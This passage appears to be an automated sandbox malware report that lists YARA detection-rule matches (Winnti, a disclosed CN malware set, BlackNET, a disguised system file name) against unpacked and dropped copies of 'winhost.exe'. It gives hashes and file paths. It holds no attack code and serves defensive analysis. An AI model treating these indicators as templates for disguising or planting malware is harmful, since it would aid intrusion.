                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE